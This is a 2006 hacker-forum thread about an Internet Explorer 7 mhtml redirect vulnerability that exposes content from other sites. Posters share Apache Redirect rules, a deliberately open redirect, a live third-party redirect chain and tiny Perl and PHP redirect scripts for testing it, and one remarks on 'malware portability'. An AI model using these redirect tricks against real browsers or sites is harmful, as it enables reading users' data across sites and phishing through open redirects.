Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
IE 7 hole on release - shocked, shocked I am
Posted by: id
Date: October 19, 2006 03:03PM

http://secunia.com/Internet_Explorer_Arbitrary_Content_Disclosure_Vulnerability_Test/

shocked.

-id

Options: ReplyQuote
Re: IE 7 hole on release - shocked, shocked I am
Posted by: id
Date: October 19, 2006 03:06PM

bah, rsnake beat me to it on ha.ckers

-id

Options: ReplyQuote
Re: IE 7 hole on release - shocked, shocked I am
Posted by: maluc
Date: October 19, 2006 06:50PM

Well for those looking to test it out, you can add a specific website by adding this to the httpd.conf in Apache web servers, inside the <IfModule alias_module></IfModule>:
    Redirect /foo.php mhtml:http_//mrsunshine/bar.php
    Redirect /bar.php http_//www.victimsite.com

Usage: http_//mysite.com/foo.php http://mysite.com/foo.php

If you want a general purpose one, this'll work but creates an open redirect so keep that in mind. Also in the <IfModule alias_module></IfModule>:
    RedirectMatch \/redir\/\*(.*)$ $1

Usage: http_//mysite.com/redir/*mhtml:http_//mysite.com/redir/*http_//targetsite.com http://mysite.com/redir/*mhtml:http://mysite.com/redir/*http://targetsite.com

To add to the .htaccess instead, i believe its the same, just minus the initial / forward slash. i.e. /foo.php to foo.php, /bar.php to bar.php, and \/redir\/ to redir\/ .. but don't quote me on that, RTFM.

But most importantly, finally a non-phishing use for open redirects ^^
http://www.pussy.org/cgi-bin/ucj/c.cgi?url=mhtml:http://www.pussy.org/cgi-bin/ucj/c.cgi?url=http://disney.com

-maluc

Options: ReplyQuote
Re: IE 7 hole on release - shocked, shocked I am
Posted by: rsnake
Date: October 19, 2006 07:05PM

hahah... nice... and yes, all that will work... or you can just set up a tiny .cgi or .php script to do redirection. It doesn't need to be robust:

$cat a.cgi b.cgi
#!/usr/bin/perl
print "Location: mhtml://www.google.com\n\n";

#!/usr/bin/perl
print "Location: html://www.google.com\n\n";

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: IE 7 hole on release - shocked, shocked I am
Posted by: maluc
Date: October 19, 2006 08:06PM

ya.. <?php header("Location: http://www.google.com"); exit(); ?> for php should do it. Was more of a personal preference :x

If i can't do something from javascript space, i like to switch to the other extreme, and do it from the webserver conf. Although for malware portability, php is probably the best choice :/

-maluc

Options: ReplyQuote
Re: IE 7 hole on release - shocked, shocked I am
Posted by: lpilorz
Date: October 23, 2006 08:38AM

As far as I know, msoert2.dll is not present by default in Windows Vista (which has Windows Mail instead of Outlook Express), so probably its users are not vulnerable.

Nothing new, I just wrote it for anyone that could look for info here.

Options: ReplyQuote


Sorry, only registered users may post in this forum.